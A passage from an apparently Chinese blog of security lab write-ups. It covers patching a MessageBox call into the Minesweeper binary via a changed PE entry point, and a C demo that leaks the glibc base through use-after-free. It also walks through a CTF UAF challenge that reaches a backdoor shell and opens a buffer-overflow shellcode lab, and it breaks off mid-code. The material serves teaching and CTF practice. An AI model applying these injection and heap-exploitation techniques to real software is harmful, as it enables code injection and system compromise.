RVA）</li></ul><p>相对虚拟地址是内存地址相对于映射基址的偏移量。</p><p><strong>一个很重要的概念！！下一个实验也用到了：</strong></p><p>在默认情况下，一般PE文件的0字节将对映射到虚拟内存的0x00400000位置，这个地址就是所谓的装载基址（Image Base）。</p><p>文件偏移是相对于文件开始处0字节的偏移，RVA（相对虚拟地址）则是相对于装载基址0x00400000处的偏移。由于操作系统在进行装载时“基本”上保持PE中的各种数据结构，所以文件偏移地址和RVA有很大的一致性。</p><p>之所以说“基本”上一致是因为还有一些细微的差异。这些差异是由于文件数据的存放单位与内存数据存放单位不同而造成的。</p><p>  （1）PE文件中的数据按照磁盘数据标准存放，以0x200字节为基本单位进行组织。当一个数据节（section）不足0x200字节时，不足的地方将被0x00填充：当一个数据节超过0x200字节时，下一个0x200块将分配给这个节使用。因此PE数据节的大小永远是0x200的整数倍。</p><p>（2）<strong>当代码装入内存后，将按照内存数据标准存放，并以0x1000字节为基本单位进行组织。类似的，不足将被补全，若超出将分配下一个0x1000为其所用。因此，内存中的节总是0x1000的整数倍。</strong> </p><h4 id="2-汇编常见指令"><a href="#2-汇编常见指令" class="headerlink" title="2. 汇编常见指令"></a>2. 汇编常见指令</h4><p><strong>在汇编语言中，主要有以下几类类寄存器：</strong></p><p>·4个数据寄存器(EAX、EBX、ECX和EDX)</p><p>·2个变址寄存器(ESI和EDI) 2个指针寄存器(ESP和EBP)</p><p>·6个段寄存器(ES、CS、SS、DS、FS和GS)</p><p>·1个指令指针寄存器(EIP) 1个标志寄存器(EFlags)</p><h4 id="3-实验操作："><a href="#3-实验操作：" class="headerlink" title="3. 实验操作："></a>3. 实验操作：</h4><p>检查程序加壳情况：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110219735.png" alt="image-20250102110219735"></p><p>用OllyDBG打开扫雷程序：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110224098.png" alt="image-20250102110224098"></p><p>程序停在了0x01003E21的位置，这个就是程序的入口点。同样也可以通过LordPE，得知程序RVA为0x01003E21，同样可以看到装载基址是0x01000000（这里可以看出扫雷程序是C++编写)；右侧寄存器EIP值0x01003E21后标识ModuleEntryPoint！</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110229117.png" alt="image-20250102110229117"></p><p>往下翻可以看到相关的导入表动态连接库及其相关函数信息：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110234157.png" alt="image-20250102110234157"></p><p>往下翻可以看到大量空白代码区域，这段区域.data是代码区，如果我们在这里植入代码，再修改PE文件跳转入口，可以实现相关的植入代码执行</p><p>我们看MessageBox：<br><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110239218.png" alt="image-20250102110239218"></p><p>以下我们编辑注入代码：</p><p>因为我们选择的A类函数，我们直接编辑db类型的ascii码即可，输入后按A分析。</p><p>我们可以注意到，每行语句后都留有00，因为字符串后面是需要结束符0x00的。</p><p>题目要求弹框后进入正常运行，所以我们需要先调用弹窗函数，再跳转到一开始的程序入口位置。</p><p>在输入汇编指令call MessageBoxA、jmp start后能直接识别，是因为PE文件中已经有这个函数的相关分析，直接引用。</p><p>下面是修改后的状态：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110246160.png" alt="image-20250102110246160"></p><p>用<strong>PEeditor修改程序入口为0x1004ABF</strong>，注入成功！</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110251380.png" alt="image-20250102110251380"><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110257267.png" alt="image-20250102110257267"></p><p><strong>点击保存，运行程序，弹出弹窗，运行程序。</strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110302765.png" alt="image-20250102110302765"></p><p><strong>如果用IDA修改：</strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110308766.png" alt="image-20250102110308766"></p><p>查壳</p><p>首先在数据段找一段空白处插入字符串：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110314365.png" alt="image-20250102110314365"></p><p>找一段有可执行权限的内存注入指令，调用 call MessageBoxA 需要通过动态调试查看相应函数在动态链接库的地址</p><p>  很糟糕，动调也没看到这个函数：（运行环境win11）</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110320440.png" alt="image-20250102110320440"></p><p>这里我们改用MessageBoxW，unicode输入：</p><p>*+长度可以定义dw长度：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110325088.png" alt="image-20250102110325088"></p><p>像刚刚ollygbd里一样修改：<img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110330240.png" alt="image-20250102110330240"></p><p>记录程序入口01005403（修改刚刚的rva</p><p>这里我们用010editor直接修改程序入口点</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110344041.png" alt="image-20250102110344041"></p><h2 id="实验二：基于UAF漏洞泄漏glibc基地址实验"><a href="#实验二：基于UAF漏洞泄漏glibc基地址实验" class="headerlink" title="实验二：基于UAF漏洞泄漏glibc基地址实验"></a><strong>实验二：基于UAF漏洞泄漏glibc基地址实验</strong></h2><blockquote><p> 程序编译开启了随即地址保护，为了使前后一致，都使用的同一次实验截图</p></blockquote><p>这里是运行源代码：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line"><span class="type">char</span> *p = <span class="built_in">malloc</span>(<span class="number">0x80</span>); <span class="comment">//这里*p是申请的堆的地址 的地址</span></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;p = %p\n&quot;</span>, p); <span class="comment">//print申请的堆地址 的地址</span></span><br><span class="line"><span class="built_in">free</span>(p);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;*p = %p\n&quot;</span>,*(<span class="type">void</span> **)p); <span class="comment">//print 申请的堆地址的地址</span></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;main_arena=%p\n&quot;</span>,*(<span class="type">void</span> **)p<span class="number">-88</span>); </span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;libc base=%p\n&quot;</span>,*(<span class="type">void</span> **)p–<span class="number">88</span>–<span class="number">0x3c4b20</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行即可得到：</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">p = <span class="number">0</span>x1b5b010 </span><br><span class="line">*p = <span class="number">0</span>x7f5a925c4b78</span><br><span class="line">main_arena = <span class="number">0</span>x7f5a925c4b20</span><br><span class="line">libc base = <span class="number">0</span>x7f5a92200000</span><br></pre></td></tr></table></figure><h3 id="如何正确运行："><a href="#如何正确运行：" class="headerlink" title="如何正确运行："></a>如何正确运行：</h3><p>实验要求：64位Ubuntu 16.04操作系统，glibc-2.23.</p><p>因为不同的可执行文件对于libc版本有不同的要求，为了不用遇到一个类型的libc装一个类型的libc，这里用glibc-all-in-one工具进行版本管理<br>（如果只做这一次实验，推荐是直接装glibc2.23）</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~/glibc-all-<span class="keyword">in</span>-one]</span><br><span class="line">└─$ cat list                  </span><br><span class="line"><span class="number">2</span>.<span class="number">23</span>-<span class="number">0</span>ubuntu11.<span class="number">3</span>_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">23</span>-<span class="number">0</span>ubuntu11.<span class="number">3</span>_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">23</span>-<span class="number">0</span>ubuntu3_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">23</span>-<span class="number">0</span>ubuntu3_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">27</span>-<span class="number">3</span>ubuntu1.<span class="number">5</span>_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">27</span>-<span class="number">3</span>ubuntu1.<span class="number">5</span>_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">27</span>-<span class="number">3</span>ubuntu1.<span class="number">6</span>_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">27</span>-<span class="number">3</span>ubuntu1.<span class="number">6</span>_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">27</span>-<span class="number">3</span>ubuntu1_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">27</span>-<span class="number">3</span>ubuntu1_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">31</span>-<span class="number">0</span>ubuntu9.<span class="number">16</span>_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">31</span>-<span class="number">0</span>ubuntu9.<span class="number">16</span>_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">31</span>-<span class="number">0</span>ubuntu9_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">31</span>-<span class="number">0</span>ubuntu9_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">35</span>-<span class="number">0</span>ubuntu3.<span class="number">8</span>_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">35</span>-<span class="number">0</span>ubuntu3.<span class="number">8</span>_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">35</span>-<span class="number">0</span>ubuntu3_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">35</span>-<span class="number">0</span>ubuntu3_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">37</span>-<span class="number">0</span>ubuntu2.<span class="number">2</span>_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">37</span>-<span class="number">0</span>ubuntu2.<span class="number">2</span>_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">37</span>-<span class="number">0</span>ubuntu2_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">37</span>-<span class="number">0</span>ubuntu2_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">38</span>-<span class="number">1</span>ubuntu6.<span class="number">3</span>_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">38</span>-<span class="number">1</span>ubuntu6.<span class="number">3</span>_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">38</span>-<span class="number">1</span>ubuntu6_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">38</span>-<span class="number">1</span>ubuntu6_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">39</span>-<span class="number">0</span>ubuntu8.<span class="number">3</span>_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">39</span>-<span class="number">0</span>ubuntu8.<span class="number">3</span>_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">39</span>-<span class="number">0</span>ubuntu8_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">39</span>-<span class="number">0</span>ubuntu8_i386</span><br><span class="line"><span class="number">2</span>.<span class="number">40</span>-<span class="number">1</span>ubuntu1_amd64</span><br><span class="line"><span class="number">2</span>.<span class="number">40</span>-<span class="number">1</span>ubuntu1_i386</span><br><span class="line">                                                                                                                                           </span><br><span class="line">┌──(kali㉿kali)-[~/glibc-all-<span class="keyword">in</span>-one]</span><br><span class="line">└─$ ./download <span class="number">2</span>.<span class="number">23</span>-<span class="number">0</span>ubuntu11.<span class="number">3</span>_amd64 </span><br><span class="line">Getting <span class="number">2</span>.<span class="number">23</span>-<span class="number">0</span>ubuntu11.<span class="number">3</span>_amd64</span><br><span class="line">--&gt; Downloaded before. Remove it to download again.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>接着用patchelf修改本地程序链接libc版本：</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~/Desktop]</span><br><span class="line">└─$ patchelf --<span class="built_in">set</span>-rpath /home/kali/glibc-all-<span class="keyword">in</span>-one/libs/<span class="number">2</span>.<span class="number">23</span>-<span class="number">0</span>ubuntu11.<span class="number">3</span>_amd64/ test  </span><br><span class="line">                                                                                                                                           </span><br><span class="line">┌──(kali㉿kali)-[~/Desktop]</span><br><span class="line">└─$ patchelf --<span class="built_in">set</span>-interpreter /home/kali/glibc-all-<span class="keyword">in</span>-one/libs/<span class="number">2</span>.<span class="number">23</span>-<span class="number">0</span>ubuntu11.<span class="number">3</span>_amd64/ld-<span class="number">2</span>.<span class="number">23</span>.so  test </span><br><span class="line">                                                                                                                                           </span><br><span class="line">┌──(kali㉿kali)-[~/Desktop]</span><br><span class="line">└─$ ./test                            </span><br><span class="line">p = <span class="number">0</span>x1b5b010 </span><br><span class="line">*p = <span class="number">0</span>x7f5a925c4b78</span><br><span class="line">main_arena = <span class="number">0</span>x7f5a925c4b20</span><br><span class="line">libc base = <span class="number">0</span>x7f5a92200000</span><br></pre></td></tr></table></figure><h3 id="如何快速证明main-arena和libc-base输出是正确的位置："><a href="#如何快速证明main-arena和libc-base输出是正确的位置：" class="headerlink" title="如何快速证明main_arena和libc_base输出是正确的位置："></a>如何快速证明main_arena和libc_base输出是正确的位置：</h3><h4 id="libc-base"><a href="#libc-base" class="headerlink" title="libc_base:"></a>libc_base:</h4><p>这里我是用IDA远程连接kali动态调试：</p><p>此时我们点击malloc函数 跳入函数调用表 再点击进入libc函数 最后点击就是malloc函数的位置</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222191930083.png" alt="image-20241222191930083"></p><p>往上翻可以看到libc_base地址 0x7f5a92200000</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222192014019.png" alt="image-20241222192014019"></p><h4 id="main-arena"><a href="#main-arena" class="headerlink" title="main_arena:"></a>main_arena:</h4><p>main_arena中布局为 88位 ，第一个申请的unsorted的堆的位置-0x88就是main_arena位置</p><hr><h3 id="对每一块的解释"><a href="#对每一块的解释" class="headerlink" title="对每一块的解释"></a>对每一块的解释</h3><p><strong>以下是对每一块我不理解的东西的一些解释，探索过程是从后往前的，但是解释是从前往后的，所以最后一块写了很多多余的东西，找到自己想知道的就行。</strong></p><h3 id="为什么要申请0x80大小的malloc："><a href="#为什么要申请0x80大小的malloc：" class="headerlink" title="为什么要申请0x80大小的malloc："></a>为什么要申请0x80大小的malloc：</h3><p>一个快速的了解堆：<a href="https://blog.csdn.net/qq_41453285/article/details/96865321">堆漏洞挖掘中的bins分类(fastbin、unsorted bin、small bin、large bin)</a></p><p>一个极致详细的了解堆：[glibc heap——从入门到入土 ](<a href="http://jmpcliff.top/2124/04/21/Blog/Pwn/pwn">http://jmpcliff.top/2124/04/21/Blog/Pwn/pwn</a> note&#x2F;glibc-heap&#x2F;glibc heap从入门到入土&#x2F;)</p><p>fastbins为单链表存储。unsortedbin、smallbins、largebins都是双向循环链表存储。</p><p>free掉的chunk，如果大小在0x20~0x80之间会直接放到fastbins上去，大于0x80的会放到unsortedbin上，然后进行整理。</p><p>我们要利用这个双向循环列表的unsorted特性，来对UAF进行实验，这就是为什么选择申请0x80的大小</p><h3 id="为什么要找main-arena的位置"><a href="#为什么要找main-arena的位置" class="headerlink" title="为什么要找main_arena的位置"></a>为什么要找main_arena的位置</h3><p>UAF——Use after free(<a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/use-after-free/">Use After Free - CTF Wiki</a>)</p><p>程序在创建堆的时候是会调用__malloc_hook的，这里如果我们将这个hook的指向地址替换为可控制的程序函数地址就可以执行我们需要的shellcode，所以我们需要定位__malloc_hook，而在libc-2.23中，hook的位置是main_arena的位置减0x10</p><h3 id="怎么找到Main-arena位置呢-为什么-88？"><a href="#怎么找到Main-arena位置呢-为什么-88？" class="headerlink" title="怎么找到Main_arena位置呢&#x2F;为什么-88？"></a>怎么找到Main_arena位置呢&#x2F;为什么-88？</h3><h5 id="首先我们需要知道什么是arena"><a href="#首先我们需要知道什么是arena" class="headerlink" title="首先我们需要知道什么是arena:"></a>首先我们需要知道什么是arena:</h5><p>这篇博客写的很清楚：<a href="https://dongshao.blog.csdn.net/article/details/96846067?fromshare=blogdetail&sharetype=blogdetail&sharerId=96846067&sharerefer=PC&sharesource=diaoqi599&sharefrom=from_link">什么是Arena</a></p><p>管理堆的部分程序称为<strong>堆管理器</strong>，堆管理器处于用户程序与内核中间，其工作为malloc和free（分配和回收堆空间）</p><p>堆的glibc实现包括struct _heap_info，struct malloc_state，struct malloc_chunk这3个结构体。</p><p><strong>Arena就是来管理线程中这些堆的信息</strong></p><p>一个线程只有一个arena，并且这些线程的arnea都是独立的不是相同的。<strong>主线程的arnea称为main_arena</strong>，相对子线程为thread_arena</p><h5 id="Arena实现的struct-malloc-state"><a href="#Arena实现的struct-malloc-state" class="headerlink" title="Arena实现的struct malloc_state:"></a>Arena实现的struct malloc_state:</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_state</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="comment">/* Serialize access.  */</span></span><br><span class="line">  __libc_lock_define (, mutex);  <span class="comment">//mutex锁 //4字节</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Flags (formerly in max_fast).  */</span></span><br><span class="line">  <span class="type">int</span> flags;  <span class="comment">//4字节</span></span><br><span class="line"><span class="comment">//##########8字节############</span></span><br><span class="line">  <span class="comment">/* Set if the fastbin chunks contain recently inserted free blocks.  */</span></span><br><span class="line">  <span class="comment">/* Note this is a bool but not all targets support atomics on booleans.  */</span></span><br><span class="line">  <span class="type">int</span> have_fastchunks;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Fastbins */</span></span><br><span class="line">  mfastbinptr fastbinsY[NFASTBINS];<span class="comment">// 看代码下面的解释1  一共80字节</span></span><br><span class="line"><span class="comment">//##########88字节############</span></span><br><span class="line">  <span class="comment">/* Base of the topmost chunk -- not otherwise kept in a bin */</span></span><br><span class="line">  mchunkptr top;  <span class="comment">//8字节</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* The remainder from the most recent split of a small request */</span></span><br><span class="line">  mchunkptr last_remainder;<span class="comment">//8字节</span></span><br><span class="line"><span class="comment">//##########96字节############</span></span><br><span class="line">  <span class="comment">/* Normal bins packed as described above */</span></span><br><span class="line">  mchunkptr bins[NBINS * <span class="number">2</span> - <span class="number">2</span>];  <span class="comment">//&lt;---这里是我们存入的点 //看下面解释2</span></span><br><span class="line">    </span><br><span class="line">  <span class="comment">/* Bitmap of bins */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> binmap[BINMAPSIZE];</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Linked list */</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">malloc_state</span> *<span class="title">next</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Linked list for free arenas.  Access to this field is serialized</span></span><br><span class="line"><span class="comment">     by free_list_lock in arena.c.  */</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">malloc_state</span> *<span class="title">next_free</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Number of threads attached to this arena.  0 if the arena is on</span></span><br><span class="line"><span class="comment">     the free list.  Access to this field is serialized by</span></span><br><span class="line"><span class="comment">     free_list_lock in arena.c.  */</span></span><br><span class="line">  INTERNAL_SIZE_T attached_threads;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Memory allocated from the system in this arena.  */</span></span><br><span class="line">  INTERNAL_SIZE_T system_mem;</span><br><span class="line">  INTERNAL_SIZE_T max_system_mem;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h6 id="解释1"><a href="#解释1" class="headerlink" title="解释1"></a><strong>解释1</strong></h6><p>要求<strong>mfastbinptr fastbinsY[NFASTBINS];</strong></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222231212774.png" alt="image-20241222231212774"></p><p>先求MAX_FAST_SIZE，进入SIZE_SZ</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222231144255.png" alt="image-20241222231144255"></p><p>SIZE_SZ为8字节，所以这时候MAX_FAST_SIZE就是0xA0</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222231026224.png" alt="image-20241222231026224"></p><p>request2size(0xA0)&#x2F;&#x2F;将需求size转换为申请的chunk_size–&gt; 0xB0</p><p>fastbin_index(0xB0)+1    —&gt;     0xB-2+1&#x3D;0xA</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222231454155.png" alt="image-20241222231454155"></p><p>一个int8字节，0xA*8 &#x3D; 0x50</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222231722937.png" alt="image-20241222231722937"></p><h6 id="解释2"><a href="#解释2" class="headerlink" title="解释2"></a>解释2</h6><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">  <span class="comment">/* Base of the topmost chunk -- not otherwise kept in a bin */</span></span><br><span class="line">  mchunkptr top;  <span class="comment">//8字节</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* The remainder from the most recent split of a small request */</span></span><br><span class="line">  mchunkptr last_remainder;<span class="comment">//8字节</span></span><br><span class="line"><span class="comment">//##########96字节############</span></span><br><span class="line">  <span class="comment">/* Normal bins packed as described above */</span></span><br><span class="line">  mchunkptr bins[NBINS * <span class="number">2</span> - <span class="number">2</span>]; </span><br></pre></td></tr></table></figure><p>[关于bins中的1mol东西](<a href="http://jmpcliff.top/2124/04/21/Blog/Pwn/pwn">http://jmpcliff.top/2124/04/21/Blog/Pwn/pwn</a> note&#x2F;glibc-heap&#x2F;glibc heap从入门到入土&#x2F;#bins数组)</p><h3 id="为什么减0x3c4b20？"><a href="#为什么减0x3c4b20？" class="headerlink" title="为什么减0x3c4b20？"></a>为什么减0x3c4b20？</h3><p>知道了刚刚那些奇奇怪怪的东西，自然也就知道为什么了。</p><p>以下是刚拿到这个代码时提出的问题，在逆向探究时候，部分解释根据逻辑顺序放到了上面。</p><p>先定位libc-2.23中的0x3C4B20位置，看看有什么：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222202458997.png" alt="image-20241222202458997"></p><p>欸？上面怎么是malloc_hook呢？而且只差了0x10的偏移，搜搜<a href="https://blog.csdn.net/hejinjing_tom_com/article/details/124007460?fromshare=blogdetail&sharetype=blogdetail&sharerId=124007460&sharerefer=PC&sharesource=diaoqi599&sharefrom=from_link">malloc_hook 研究.</a></p><p>文中指出，__malloc_hook是glibc定义的一组变量，即函数指针，由此去调用对应的函数，所以称为hook，在运行的程序中（也只有运行中的程序才能看到，因为堆是动态分配）也能看到，</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222202727214.png" alt="image-20241222202727214"></p><p>我们反编译libc-2.23.so文件，对照着看：</p><p>先来到*p的地址，因为我们开辟了0x80大小的位置，所以不会在fastbin中分配（fastbin大小为0x58，也就是80）</p><p><code>char *p = malloc(0x80);</code></p><p><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/heap-overview/?h=malloc#malloc">malloc的行为</a>——malloc 函数返回对应大小字节的内存块的指针，所以*p是这个堆的地址</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241222201326842.png" alt="image-20241222201326842"></p><p><strong>以上是我对UAF实验中这段代码和代码行为的全部问题与探索。</strong></p><h3 id="整点好玩儿的UAF-pwn题"><a href="#整点好玩儿的UAF-pwn题" class="headerlink" title="整点好玩儿的UAF-pwn题"></a>整点好玩儿的UAF-pwn题</h3><h4 id="NISACTF-2022-UAF"><a href="#NISACTF-2022-UAF" class="headerlink" title="[NISACTF 2022]UAF"></a>[NISACTF 2022]UAF</h4><p>看到backdoor！但这个后门函数没有被调用，所以我们在传入sh之后还需要调用这个函数</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102222043139.png" alt="image-20250102222043139"></p><p>page[0]不可写，这就要利用UAF来绕过对page 0写的限制：</p><p>申请page 0后释放，再申请page 1，此时获得的指针还是指向之前分配给的page 0</p><p>修改page 0中的内容，show展示page 0，即可调用通过payload篡改的地址，即后门函数，getshell！</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102224910622.png" alt="image-20250102224910622" style="zoom: 67%;" /><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102225125722.png" alt="image-20250102225125722" style="zoom: 67%;" /></p><h3 id="后话"><a href="#后话" class="headerlink" title="后话"></a>后话</h3><p>结束！爽了！彻底搞清楚了！！！！！从吃饭回来到0点！</p><p>（鞠躬！</p><p>感谢Jmp.Cliff师傅对struct malloc_state的超详细解读和队友对于我各种奇怪的问题的解答）</p><h2 id="实验三：Shellcode编写实验"><a href="#实验三：Shellcode编写实验" class="headerlink" title="实验三：Shellcode编写实验"></a><strong>实验三：Shellcode编写实验</strong></h2><h3 id="一．-实验环境"><a href="#一．-实验环境" class="headerlink" title="一． 实验环境"></a>一． 实验环境</h3><p>Windows XP操作系统。</p><h3 id="二．-实验目的"><a href="#二．-实验目的" class="headerlink" title="二． 实验目的"></a>二． 实验目的</h3><p>基于给定的示例程序：</p><ol><li><p>分析代码并理解存在的缓冲区溢出漏洞</p></li><li><p>编写shellcode利用发现的缓冲区溢出漏洞实现一个弹出对话框的功能</p></li></ol><h3 id="三．-实验步骤"><a href="#三．-实验步骤" class="headerlink" title="三． 实验步骤"></a>三． 实验步骤</h3><p>弄清楚程序有几个输入点，这些输入将最终会当作哪个函数的第几个参数读入到内存的那一个区域，哪一个输入会造成栈溢出，在复制到栈区的时候对这些数据有没有额外的限制等。调试之后还要计算函数返回地址距离缓冲区的偏移并淹没之，选择指令的地址，最终制作出一个有攻击效果的“承载”着shellcode的输入字符串。</p><p>这里分析上课提到的函数：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 